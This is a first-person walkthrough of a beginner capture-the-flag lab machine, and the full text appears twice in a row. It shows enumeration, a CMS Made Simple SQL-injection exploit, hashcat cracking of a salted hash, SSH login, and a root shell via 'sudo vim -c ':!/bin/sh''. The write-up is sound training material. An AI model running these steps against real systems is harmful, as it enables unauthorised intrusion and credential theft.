SimpleCTF: A Beginner-Friendly CTF Walkthrough

Introduction

SimpleCTF is a beginner-friendly Capture The Flag challenge that covers fundamental penetration testing concepts including enumeration, exploitation, and privilege escalation. This walkthrough details the methodology and tools used to compromise the target system and obtain root access.

Target IP: 10.10.129.8

Reconnaissance and Enumeration

Initial Port Scan

I started with an Nmap scan to identify open services on the target:

sudo nmap -Pn -sV 10.10.129.8

The scan revealed three open ports:

• Port 21 (FTP) - vsftpd 3.0.3 with anonymous login enabled

• Port 80 (HTTP) - Apache httpd 2.4.18 running on Ubuntu

• Port 2222 (SSH) - OpenSSH 7.2p2

A more aggressive scan with script enumeration provided additional details, including the presence of a robots.txt file on the web server with disallowed entries pointing to /openemr-5_0_1_3.

FTP Enumeration

Since anonymous FTP login was enabled, I connected to investigate:

ftp 10.10.129.8

After logging in anonymously, I discovered a file named ForMitch.txt in the /pub directory. I downloaded it using:

get ForMitch.txt

This file likely contained useful information for later stages of the attack.

Web Application Enumeration

I used Gobuster to enumerate directories on the web server:

gobuster dir -url http://10.10.129.8/ --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

This revealed a /simple directory, which turned out to be running CMS Made Simple.

Exploitation

CMS Made Simple Vulnerability (CVE-2019-9053)

After identifying the CMS, I searched for known vulnerabilities and found CVE-2019-9053, a SQL injection vulnerability in CMS Made Simple. I located an exploit on Exploit-DB (https://www.exploit-db.com/exploits/46635).

Running the exploit revealed:

• Username: mitch

• Email: admin@admin.com

• Password hash: 0c01f4468bd75d7a84c7eb73846e8d96

• Salt: 1dac0d92e9fa6bb2

Password Cracking

I used Hashcat to crack the MD5 hash with salt:

hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt

The password was successfully cracked: secret

SSH Access

With valid credentials (mitch:secret), I connected via SSH on the non-standard port:

ssh mitch@10.10.129.8 -p 2222

After gaining initial access, I spawned a proper bash shell for better interaction.

Privilege Escalation

Sudo Privileges Check

I checked what commands the user could run with sudo:

sudo -l

The output revealed that mitch could run /usr/bin/vim as root without a password:

User mitch may run the following commands on Machine: (root) NOPASSWD: /usr/bin/vim

Exploiting Vim for Root Access

Using GTFOBins (https://gtfobins.github.io/gtfobins/vim/#sudo), I leveraged vim's command execution capability to spawn a root shell:

sudo vim -c ':!/bin/sh'

This granted me a root shell, allowing me to navigate to /root and capture the final flag:

cd /root cat root.txt

Flag: W3ll d0n3. You made it!

Key Takeaways

This CTF reinforced several important concepts:

1. Thorough enumeration is critical - Multiple services and directories needed investigation

2. Default credentials and misconfigurations - Anonymous FTP access provided valuable reconnaissance data

3. Known vulnerabilities - Outdated CMS versions are low-hanging fruit for attackers

4. Sudo misconfigurations - Allowing unrestricted access to powerful tools like vim can lead to privilege escalation

5. Multiple attack vectors - This challenge combined web exploitation, password cracking, and Linux privilege escalation

Tools Used

• Nmap (port scanning and service enumeration)

• FTP client (anonymous access)

• Gobuster (directory enumeration)

• Hashcat (password cracking)

• SSH (remote access)

• GTFOBins (privilege escalation reference)

This was an excellent introductory CTF that demonstrated a realistic attack chain from initial reconnaissance through to full system compromise.SimpleCTF: A Beginner-Friendly CTF Walkthrough

Introduction

SimpleCTF is a beginner-friendly Capture The Flag challenge that covers fundamental penetration testing concepts including enumeration, exploitation, and privilege escalation. This walkthrough details the methodology and tools used to compromise the target system and obtain root access.

Target IP: 10.10.129.8

Reconnaissance and Enumeration

Initial Port Scan

I started with an Nmap scan to identify open services on the target:

sudo nmap -Pn -sV 10.10.129.8

The scan revealed three open ports:

• Port 21 (FTP) - vsftpd 3.0.3 with anonymous login enabled

• Port 80 (HTTP) - Apache httpd 2.4.18 running on Ubuntu

• Port 2222 (SSH) - OpenSSH 7.2p2

A more aggressive scan with script enumeration provided additional details, including the presence of a robots.txt file on the web server with disallowed entries pointing to /openemr-5_0_1_3.

FTP Enumeration

Since anonymous FTP login was enabled, I connected to investigate:

ftp 10.10.129.8

After logging in anonymously, I discovered a file named ForMitch.txt in the /pub directory. I downloaded it using:

get ForMitch.txt

This file likely contained useful information for later stages of the attack.

Web Application Enumeration

I used Gobuster to enumerate directories on the web server:

gobuster dir -url http://10.10.129.8/ --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

This revealed a /simple directory, which turned out to be running CMS Made Simple.

Exploitation

CMS Made Simple Vulnerability (CVE-2019-9053)

After identifying the CMS, I searched for known vulnerabilities and found CVE-2019-9053, a SQL injection vulnerability in CMS Made Simple. I located an exploit on Exploit-DB (https://www.exploit-db.com/exploits/46635).

Running the exploit revealed:

• Username: mitch

• Email: admin@admin.com

• Password hash: 0c01f4468bd75d7a84c7eb73846e8d96

• Salt: 1dac0d92e9fa6bb2

Password Cracking

I used Hashcat to crack the MD5 hash with salt:

hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt

The password was successfully cracked: secret

SSH Access

With valid credentials (mitch:secret), I connected via SSH on the non-standard port:

ssh mitch@10.10.129.8 -p 2222

After gaining initial access, I spawned a proper bash shell for better interaction.

Privilege Escalation

Sudo Privileges Check

I checked what commands the user could run with sudo:

sudo -l

The output revealed that mitch could run /usr/bin/vim as root without a password:

User mitch may run the following commands on Machine: (root) NOPASSWD: /usr/bin/vim

Exploiting Vim for Root Access

Using GTFOBins (https://gtfobins.github.io/gtfobins/vim/#sudo), I leveraged vim's command execution capability to spawn a root shell:

sudo vim -c ':!/bin/sh'

This granted me a root shell, allowing me to navigate to /root and capture the final flag:

cd /root cat root.txt

Flag: W3ll d0n3. You made it!

Key Takeaways

This CTF reinforced several important concepts:

1. Thorough enumeration is critical - Multiple services and directories needed investigation

2. Default credentials and misconfigurations - Anonymous FTP access provided valuable reconnaissance data

3. Known vulnerabilities - Outdated CMS versions are low-hanging fruit for attackers

4. Sudo misconfigurations - Allowing unrestricted access to powerful tools like vim can lead to privilege escalation

5. Multiple attack vectors - This challenge combined web exploitation, password cracking, and Linux privilege escalation

Tools Used

• Nmap (port scanning and service enumeration)

• FTP client (anonymous access)

• Gobuster (directory enumeration)

• Hashcat (password cracking)

• SSH (remote access)

• GTFOBins (privilege escalation reference)
  

This was an excellent introductory CTF that demonstrated a realistic attack chain from initial reconnaissance through to full system compromise.